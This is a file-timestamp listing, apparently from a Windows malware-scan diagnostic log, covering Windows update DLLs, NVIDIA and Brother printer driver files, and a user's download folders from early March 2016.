2016-03-09 11:53 - 2016-02-24 18:12 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\PhoneCallHistoryApis.dll
2016-03-09 11:53 - 2016-02-24 18:09 - 00258560 _____ (Microsoft Corporation) C:\Windows\system32\UserDataAccountApis.dll
2016-03-09 11:53 - 2016-02-24 18:09 - 00161792 _____ (Microsoft Corporation) C:\Windows\system32\AppxSip.dll
2016-03-09 11:53 - 2016-02-24 18:07 - 00252928 _____ (Microsoft Corporation) C:\Windows\system32\PimIndexMaintenance.dll
2016-03-09 11:53 - 2016-02-24 18:05 - 00208896 _____ (Microsoft Corporation) C:\Windows\system32\storewuauth.dll
2016-03-09 11:53 - 2016-02-24 18:03 - 00088576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\olepro32.dll
2016-03-09 11:53 - 2016-02-24 18:02 - 00161280 _____ (Microsoft Corporation) C:\Windows\system32\CallHistoryClient.dll
2016-03-09 11:53 - 2016-02-24 18:01 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\AuthBroker.dll
2016-03-09 11:53 - 2016-02-24 17:59 - 00450560 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Bluetooth.dll
2016-03-09 11:53 - 2016-02-24 17:59 - 00318976 _____ (Microsoft Corporation) C:\Windows\system32\domgmt.dll
2016-03-09 11:53 - 2016-02-24 17:55 - 00790528 _____ (Microsoft Corporation) C:\Windows\system32\EmailApis.dll
2016-03-09 11:53 - 2016-02-24 17:55 - 00224256 _____ (Microsoft Corporation) C:\Windows\system32\PackageStateRoaming.dll
2016-03-09 11:53 - 2016-02-24 17:55 - 00018944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExtrasXmlParser.dll
2016-03-09 11:53 - 2016-02-24 17:54 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\FirewallAPI.dll
2016-03-09 11:53 - 2016-02-24 17:54 - 00228352 _____ (Microsoft Corporation) C:\Windows\system32\wsqmcons.exe
2016-03-09 11:53 - 2016-02-24 17:49 - 00726528 _____ (Microsoft Corporation) C:\Windows\system32\ChatApis.dll
2016-03-09 11:53 - 2016-02-24 17:44 - 01713664 _____ (Microsoft Corporation) C:\Windows\system32\SRHInproc.dll
2016-03-09 11:53 - 2016-02-24 17:44 - 00700416 _____ (Microsoft Corporation) C:\Windows\system32\AppointmentApis.dll
2016-03-09 11:53 - 2016-02-24 17:44 - 00056320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\POSyncServices.dll
2016-03-09 11:53 - 2016-02-24 17:43 - 00957952 _____ (Microsoft Corporation) C:\Windows\system32\SRH.dll
2016-03-09 11:53 - 2016-02-24 17:43 - 00286720 _____ (Microsoft Corporation) C:\Windows\system32\deviceaccess.dll
2016-03-09 11:53 - 2016-02-24 17:41 - 00982016 _____ (Microsoft Corporation) C:\Windows\system32\AppxPackaging.dll
2016-03-09 11:53 - 2016-02-24 17:41 - 00436736 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentClient.dll
2016-03-09 11:53 - 2016-02-24 17:40 - 01224704 _____ (Microsoft Corporation) C:\Windows\system32\Unistore.dll
2016-03-09 11:53 - 2016-02-24 17:40 - 00078848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2016-03-09 11:53 - 2016-02-24 17:39 - 01390592 _____ (Microsoft Corporation) C:\Windows\system32\win32kbase.sys
2016-03-09 11:53 - 2016-02-24 17:38 - 00150528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VCardParser.dll
2016-03-09 11:53 - 2016-02-24 17:36 - 01847808 _____ (Microsoft Corporation) C:\Windows\system32\WMPDMC.exe
2016-03-09 11:53 - 2016-02-24 17:34 - 00938496 _____ (Microsoft Corporation) C:\Windows\system32\ContactApis.dll
2016-03-09 11:53 - 2016-02-24 17:34 - 00303104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-03-09 11:53 - 2016-02-24 17:32 - 00223744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExSMime.dll
2016-03-09 11:53 - 2016-02-24 17:32 - 00098304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppointmentActivation.dll
2016-03-09 11:53 - 2016-02-24 17:31 - 00200704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cemapi.dll
2016-03-09 11:53 - 2016-02-24 17:31 - 00169984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PhoneCallHistoryApis.dll
2016-03-09 11:53 - 2016-02-24 17:28 - 00870912 _____ (Microsoft Corporation) C:\Windows\system32\MPSSVC.dll
2016-03-09 11:53 - 2016-02-24 17:28 - 00196608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataAccountApis.dll
2016-03-09 11:53 - 2016-02-24 17:28 - 00135168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxSip.dll
2016-03-09 11:53 - 2016-02-24 17:25 - 00401408 _____ (Microsoft Corporation) C:\Windows\system32\sharemediacpl.dll
2016-03-09 11:53 - 2016-02-24 17:21 - 00315904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Internal.Bluetooth.dll
2016-03-09 11:53 - 2016-02-24 17:21 - 00168448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Scanners.dll
2016-03-09 11:53 - 2016-02-24 17:18 - 00575488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EmailApis.dll
2016-03-09 11:53 - 2016-02-24 17:18 - 00184832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PackageStateRoaming.dll
2016-03-09 11:53 - 2016-02-24 17:17 - 00369664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FirewallAPI.dll
2016-03-09 11:53 - 2016-02-24 17:13 - 00540160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ChatApis.dll
2016-03-09 11:53 - 2016-02-24 17:11 - 03593216 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2016-03-09 11:53 - 2016-02-24 17:09 - 01443328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SRHInproc.dll
2016-03-09 11:53 - 2016-02-24 17:09 - 00793600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SRH.dll
2016-03-09 11:53 - 2016-02-24 17:09 - 00552960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppointmentApis.dll
2016-03-09 11:53 - 2016-02-24 17:09 - 00228352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\deviceaccess.dll
2016-03-09 11:53 - 2016-02-24 17:07 - 00949248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Unistore.dll
2016-03-09 11:53 - 2016-02-24 17:07 - 00890368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxPackaging.dll
2016-03-09 11:53 - 2016-02-24 17:07 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppXDeploymentClient.dll
2016-03-09 11:53 - 2016-02-24 17:04 - 01497088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPDMC.exe
2016-03-09 11:53 - 2016-02-24 17:03 - 00769536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ContactApis.dll
2016-03-09 11:53 - 2016-02-24 17:01 - 01831936 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.dll
2016-03-09 11:53 - 2016-02-24 17:00 - 02273792 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2016-03-09 11:53 - 2016-02-24 17:00 - 01098752 _____ (Microsoft Corporation) C:\Windows\system32\dosvc.dll
2016-03-09 11:53 - 2016-02-24 16:57 - 02158592 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2016-03-09 11:53 - 2016-02-24 16:55 - 01996288 _____ (Microsoft Corporation) C:\Windows\system32\ActiveSyncProvider.dll
2016-03-09 11:53 - 2016-02-24 16:34 - 01707520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ActiveSyncProvider.dll
2016-03-09 11:53 - 2016-02-24 16:22 - 00163328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fwbase.dll
2016-03-09 11:53 - 2016-02-24 16:20 - 22376960 _____ (Microsoft Corporation) C:\Windows\system32\edgehtml.dll
2016-03-09 11:53 - 2016-02-24 16:18 - 18677760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2016-03-09 11:53 - 2016-02-24 16:12 - 19339776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-03-09 11:53 - 2016-02-24 16:12 - 05321728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2016-03-09 11:53 - 2016-02-24 16:10 - 24600576 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-03-09 11:53 - 2016-02-24 16:09 - 06972416 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2016-03-09 11:53 - 2016-02-24 16:05 - 12586496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2016-03-09 11:53 - 2016-02-24 16:03 - 14252544 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2016-03-09 11:53 - 2016-02-24 15:59 - 05661696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2016-03-09 11:53 - 2016-02-24 15:55 - 07835648 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2016-03-09 11:52 - 2016-02-24 18:39 - 00045568 _____ (Microsoft Corporation) C:\Windows\system32\UserDataTypeHelperUtil.dll
2016-03-09 11:52 - 2016-02-24 18:39 - 00023552 _____ (Microsoft Corporation) C:\Windows\system32\ExtrasXmlParser.dll
2016-03-09 11:52 - 2016-02-24 18:38 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\UserDataTimeUtil.dll
2016-03-09 11:52 - 2016-02-24 18:37 - 00045056 _____ (Microsoft Corporation) C:\Windows\system32\UserDataLanguageUtil.dll
2016-03-09 11:52 - 2016-02-24 18:35 - 00045568 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-03-09 11:52 - 2016-02-24 18:31 - 00118272 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2016-03-09 11:52 - 2016-02-24 18:30 - 00025600 _____ (Microsoft Corporation) C:\Windows\system32\wfapigp.dll
2016-03-09 11:52 - 2016-02-24 18:28 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\POSyncServices.dll
2016-03-09 11:52 - 2016-02-24 18:22 - 00196608 _____ (Microsoft Corporation) C:\Windows\system32\fwpolicyiomgr.dll
2016-03-09 11:52 - 2016-02-24 18:19 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\seclogon.dll
2016-03-09 11:52 - 2016-02-24 18:10 - 00093184 _____ (Microsoft Corporation) C:\Windows\system32\wpninprc.dll
2016-03-09 11:52 - 2016-02-24 18:01 - 00764928 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll
2016-03-09 11:52 - 2016-02-24 18:01 - 00067584 _____ (Microsoft Corporation) C:\Windows\system32\profext.dll
2016-03-09 11:52 - 2016-02-24 18:00 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Scanners.dll
2016-03-09 11:52 - 2016-02-24 17:59 - 00360448 _____ (Microsoft Corporation) C:\Windows\system32\vaultsvc.dll
2016-03-09 11:52 - 2016-02-24 17:58 - 00685568 _____ (Microsoft Corporation) C:\Windows\system32\scapi.dll
2016-03-09 11:52 - 2016-02-24 17:54 - 00288768 _____ (Microsoft Corporation) C:\Windows\system32\vaultcli.dll
2016-03-09 11:52 - 2016-02-24 17:54 - 00037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataTypeHelperUtil.dll
2016-03-09 11:52 - 2016-02-24 17:53 - 00089088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataTimeUtil.dll
2016-03-09 11:52 - 2016-02-24 17:53 - 00037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataLanguageUtil.dll
2016-03-09 11:52 - 2016-02-24 17:52 - 00451584 _____ (Microsoft Corporation) C:\Windows\system32\werui.dll
2016-03-09 11:52 - 2016-02-24 17:52 - 00048128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PimIndexMaintenanceClient.dll
2016-03-09 11:52 - 2016-02-24 17:51 - 00037376 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-03-09 11:52 - 2016-02-24 17:47 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2016-03-09 11:52 - 2016-02-24 17:46 - 00020480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wfapigp.dll
2016-03-09 11:52 - 2016-02-24 17:44 - 00915456 _____ (Microsoft Corporation) C:\Windows\system32\configurationclient.dll
2016-03-09 11:52 - 2016-02-24 17:40 - 00056320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataPlatformHelperUtil.dll
2016-03-09 11:52 - 2016-02-24 17:39 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fwpolicyiomgr.dll
2016-03-09 11:52 - 2016-02-24 17:23 - 00129024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CallHistoryClient.dll
2016-03-09 11:52 - 2016-02-24 17:22 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\profext.dll
2016-03-09 11:52 - 2016-02-24 17:18 - 01490432 _____ (Microsoft Corporation) C:\Windows\system32\UserDataService.dll
2016-03-09 11:52 - 2016-02-24 17:16 - 00394752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\werui.dll
2016-03-09 11:52 - 2016-02-24 16:43 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\fwbase.dll
2016-03-09 11:26 - 2016-03-09 11:35 - 00000000 ____D C:\Users\kevin\Downloads\The.Walking.Dead.S06E12.INTERNAL.720p.HDTV.x264-KILLERS[ettv]
2016-03-09 11:25 - 2016-03-09 11:26 - 00000000 ____D C:\Users\kevin\Downloads\The.Walking.Dead.S06E11.720p.WEB-DL.DD5.1.H.264-Cyphanix[ettv]
2016-03-09 11:19 - 2016-03-09 15:03 - 00000000 ____D C:\Users\kevin\AppData\LocalLow\uTorrent
2016-03-08 19:35 - 2016-03-08 21:57 - 00000000 ____D C:\Users\kevin\Downloads\[ www.Torrenting.com ] - UFC.152.Jones.vs.Belfort.DVDRip.XviD-BOV
2016-03-08 19:20 - 2016-03-08 19:20 - 00000000 ____D C:\Users\kevin\Downloads\UFC.152.Jones.vs.Belfort.PPV.HDTV.x264-EViLCREW
2016-03-08 18:41 - 2016-03-08 22:17 - 00000000 ____D C:\Users\kevin\Downloads\Jon Jones fights
2016-03-08 16:34 - 2016-03-08 16:34 - 00001454 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2016-03-08 16:34 - 2016-03-08 16:34 - 00000000 ____D C:\Users\kevin\AppData\Local\NVIDIA Corporation
2016-03-08 16:32 - 2016-03-03 20:29 - 00110016 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2016-03-08 16:31 - 2016-03-03 23:16 - 42968120 _____ C:\Windows\system32\nvcompiler.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 37608384 _____ C:\Windows\SysWOW64\nvcompiler.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 22971960 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 21322480 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 20864112 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 18907704 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 17732768 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 17368232 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 17325592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 10546944 _____ C:\Windows\system32\nvptxJitCompiler.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 08657936 _____ C:\Windows\SysWOW64\nvptxJitCompiler.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 02613696 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 02257344 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 01922496 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6436447.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 01571776 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6436447.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00956984 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00885184 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00751672 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00692160 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00678520 _____ C:\Windows\system32\nvfatbinaryLoader.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00571912 _____ C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00545816 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00448824 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00175552 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00153208 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00151368 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00128512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00099472 _____ (NVIDIA Corporation) C:\Windows\system32\nvaudcap64v.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00090768 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvaudcap32v.dll
2016-03-08 16:31 - 2016-03-03 23:16 - 00000139 _____ C:\Windows\SysWOW64\nv-vk32.json
2016-03-08 16:31 - 2016-03-03 23:16 - 00000139 _____ C:\Windows\system32\nv-vk64.json
2016-03-08 16:29 - 2016-03-08 16:30 - 340902064 _____ (NVIDIA Corporation) C:\Users\kevin\Downloads\364.47-desktop-win10-64bit-international-whql.exe
2016-03-03 16:48 - 2016-03-03 16:48 - 00002190 _____ C:\Users\kevin\Desktop\Avira Scout.lnk
2016-03-03 16:48 - 2016-03-03 16:48 - 00000000 ____D C:\Users\kevin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Avira
2016-03-03 16:48 - 2016-03-03 16:48 - 00000000 ____D C:\Users\kevin\AppData\Local\Package Cache
2016-03-02 22:43 - 2016-03-02 22:43 - 00002217 _____ C:\Users\Public\Desktop\Brother Creative Center.lnk
2016-03-02 22:43 - 2016-03-02 22:43 - 00002132 _____ C:\Users\Public\Desktop\Brother Utilities.lnk
2016-03-02 22:43 - 2016-03-02 22:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brother
2016-03-02 22:43 - 2016-03-02 22:43 - 00000000 ____D C:\Program Files (x86)\Browny02
2016-03-02 22:43 - 2016-03-02 22:43 - 00000000 ____D C:\Program Files (x86)\Brother
2016-03-02 22:43 - 2016-03-02 22:43 - 00000000 ____D C:\Brother
2016-03-02 22:43 - 2014-04-10 12:58 - 00180224 _____ (Brother Industries, Ltd.) C:\Windows\SysWOW64\BROSNMP.DLL
2016-03-02 22:43 - 2014-04-10 12:58 - 00077824 _____ (Brother Industries, Ltd.) C:\Windows\SysWOW64\BRLMW03A.DLL
2016-03-02 22:43 - 2014-04-10 12:58 - 00045056 _____ C:\Windows\SysWOW64\BRTCPCON.DLL
2016-03-02 22:43 - 2014-04-10 12:58 - 00025299 _____ (Brother Industries, Ltd) C:\Windows\SysWOW64\BRLM03A.DLL
2016-03-02 22:43 - 2014-04-10 12:58 - 00000114 _____ C:\Windows\SysWOW64\BRLMW03A.INI
2016-03-02 22:43 - 2014-04-10 12:57 - 00000050 _____ C:\Windows\system32\BRADM14A.DAT
2016-03-02 22:43 - 2014-04-10 03:00 - 00227840 _____ (Brother Industries, Ltd.) C:\Windows\system32\BRCOM14A.DLL
2016-03-02 22:43 - 2013-07-12 14:03 - 00214016 ____N (brother) C:\Windows\SysWOW64\NSSearch.dll
2016-03-02 22:43 - 2012-12-03 13:39 - 00002560 ____N (Brother Industries Ltd.) C:\Windows\SysWOW64\BrDctF2S.dll
2016-03-02 22:43 - 2010-03-15 19:45 - 00073728 ____N (Brother Industries Ltd.) C:\Windows\SysWOW64\BrDctF2.dll
2016-03-02 22:43 - 2007-12-13 22:16 - 00005120 ____N (Brother Industries Ltd.) C:\Windows\SysWOW64\BrDctF2L.dll
2016-03-02 22:42 - 2016-03-02 22:43 - 00000000 ____D C:\ProgramData\Brother
2016-03-02 22:42 - 2016-03-02 22:42 - 00000000 ____D C:\Users\kevin\Downloads\install
2016-03-02 22:41 - 2016-03-02 22:42 - 51623360 _____ (A.I.SOFT,INC.) C:\Users\kevin\Downloads\HL-1210W-inst-A1-eu.EXE
2016-03-02 22:38 - 2016-03-02 22:38 - 19712527 _____ C:\Users\kevin\Downloads\MonoLaserPRT12_2_UW_101.dmg
2016-03-02 22:38 - 2016-03-02 22:38 - 05275648 _____ C:\Users\kevin\Downloads\BrMain374_a.dmg
2016-03-02 13:26 - 2016-02-23 22:25 - 01818696 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-03-02 13:26 - 2016-02-23 21:34 - 01542816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-03-02 13:26 - 2016-02-23 21:32 - 08705672 _____ (Microsoft Corp.) C:\Windows\system32\Windows.Media.Protection.PlayReady.dll
2016-03-02 13:26 - 2016-02-23 21:32 - 00369912 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2016-03-02 13:26 - 2016-02-23 21:31 - 00536256 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2016-03-02 13:26 - 2016-02-23 20:38 - 06952088 _____ (Microsoft Corp.) C:\Windows\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-03-02 13:26 - 2016-02-23 20:27 - 21124344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2016-03-02 13:26 - 2016-02-23 19:58 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\wininetlui.dll
2016-03-02 13:26 - 2016-02-23 19:28 - 00275456 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll
2016-03-02 13:26 - 2016-02-23 19:09 - 01054208 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2016-03-02 13:26 - 2016-02-23 19:06 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininetlui.dll
2016-03-02 13:26 - 2016-02-23 19:06 - 00045568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-03-02 13:26 - 2016-02-23 19:00 - 02624512 _____ (Microsoft Corporation) C:\Windows\system32\InputService.dll
2016-03-02 13:26 - 2016-02-23 18:58 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\TextInputFramework.dll
2016-03-02 13:26 - 2016-02-23 18:30 - 01731584 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-03-02 13:26 - 2016-02-23 18:24 - 02755584 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-03-02 13:26 - 2016-02-23 18:22 - 01944576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InputService.dll
2016-03-02 13:26 - 2016-02-23 18:21 - 00245760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TextInputFramework.dll
2016-03-02 13:26 - 2016-02-23 17:59 - 01500672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-03-02 13:26 - 2016-02-23 17:55 - 04894208 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-03-02 13:26 - 2016-02-23 17:55 - 02229760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-03-02 13:26 - 2016-02-23 17:52 - 11545600 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
2016-03-02 13:26 - 2016-02-23 17:50 - 09919488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
2016-03-02 13:26 - 2016-02-23 17:39 - 13382656 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-03-02 13:26 - 2016-02-23 17:36 - 12125696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-03-02 13:26 - 2016-02-23 17:36 - 03666432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-03-02 13:26 - 2016-02-09 14:24 - 00641536 _____ (Microsoft Corporation) C:\Windows\system32\enterprisecsps.dll
2016-03-02 13:26 - 2016-02-09 14:07 - 01626624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2016-03-02 13:26 - 2016-02-09 14:04 - 01946624 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2016-03-02 13:25 - 2016-02-23 22:29 - 01030416 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-03-02 13:25 - 2016-02-23 22:29 - 00874968 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2016-03-02 13:25 - 2016-02-23 22:27 - 02654872 _____ C:\Windows\system32\CoreUIComponents.dll
2016-03-02 13:25 - 2016-02-23 22:27 - 01317640 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-03-02 13:25 - 2016-02-23 22:27 - 01141504 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2016-03-02 13:25 - 2016-02-23 22:25 - 02152288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2016-03-02 13:25 - 2016-02-23 22:25 - 00563552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\acpi.sys
2016-03-02 13:25 - 2016-02-23 22:15 - 00779384 _____ (Microsoft Corporation) C:\Windows\system32\taskschd.dll
2016-03-02 13:25 - 2016-02-23 22:08 - 00989536 _____ (Microsoft Corporation) C:\Windows\system32\SecConfig.efi
2016-03-02 13:25 - 2016-02-23 21:34 - 01859960 _____ C:\Windows\SysWOW64\CoreUIComponents.dll
2016-03-02 13:25 - 2016-02-23 21:33 - 00696160 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupEngine.dll
2016-03-02 13:25 - 2016-02-23 21:33 - 00389992 _____ (Microsoft Corporation) C:\Windows\system32\wlanapi.dll
2016-03-02 13:25 - 2016-02-23 21:32 - 02544264 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll
2016-03-02 13:25 - 2016-02-23 21:32 - 01152328 _____ (Microsoft Corporation) C:\Windows\system32\mfasfsrcsnk.dll
2016-03-02 13:25 - 2016-02-23 21:32 - 01062480 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
2016-03-02 13:25 - 2016-02-23 21:32 - 00498448 _____ (Microsoft Corporation) C:\Windows\system32\MFCaptureEngine.dll
2016-03-02 13:25 - 2016-02-23 21:31 - 01017032 _____ (Microsoft Corporation) C:\Windows\system32\mfsrcsnk.dll
2016-03-02 13:25 - 2016-02-23 21:31 - 00819648 _____ (Microsoft Corporation) C:\Windows\system32\mfmpeg2srcsnk.dll
2016-03-02 13:25 - 2016-02-23 21:31 - 00476728 _____ (Microsoft Corporation) C:\Windows\system32\msvproc.dll
2016-03-02 13:25 - 2016-02-23 21:31 - 00408120 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2016-03-02 13:25 - 2016-02-23 21:25 - 03671888 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-03-02 13:25 - 2016-02-23 21:22 - 00572272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskschd.dll
2016-03-02 13:25 - 2016-02-23 21:21 - 22564328 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-03-02 13:25 - 2016-02-23 21:17 - 00146272 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-03-02 13:25 - 2016-02-23 20:45 - 02773096 _____ (Microsoft Corporation) C:\Windows\system32\d3d11.dll
2016-03-02 13:25 - 2016-02-23 20:40 - 00430944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-03-02 13:25 - 2016-02-23 20:39 - 00502112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupEngine.dll
2016-03-02 13:25 - 2016-02-23 20:38 - 02180136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfcore.dll
2016-03-02 13:25 - 2016-02-23 20:38 - 00980352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfasfsrcsnk.dll
